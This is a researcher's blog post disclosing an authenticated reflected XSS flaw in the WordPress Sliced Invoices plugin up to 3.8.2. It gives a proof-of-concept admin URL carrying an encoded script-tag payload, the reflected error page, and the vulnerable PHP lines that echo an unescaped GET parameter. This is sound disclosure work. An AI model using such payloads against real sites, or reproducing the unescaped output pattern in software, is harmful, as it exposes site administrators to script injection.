Post

Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS

Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS

Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

Intial submission of the vulnerability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Reflected Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E
- The response will contain:
```
<body id="error-page">
	<p>Creation failed, could not find original invoice or quote: <script>alert(1)</script></p></body>
</html>
```

Detailed analysis of the vulnerability

Under wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php at line number 2236 we can observe the following unescaped output of user-supplied data:

1
wp_die('Creation failed, could not find original invoice or quote: ' . $post_id);

Where the $post_id variable is assigned on line 2154 as:

1
2
3
4
/*
* get the original post id
*/
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);

This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=%3Cscript%3Ealert(1)%3C%2fscript%3E where example.com is your target.

How to fix

Update to the latest available version of the Sliced Invoices plugin.

Public appearances

Other references

This post is licensed under CC BY 4.0 by the author.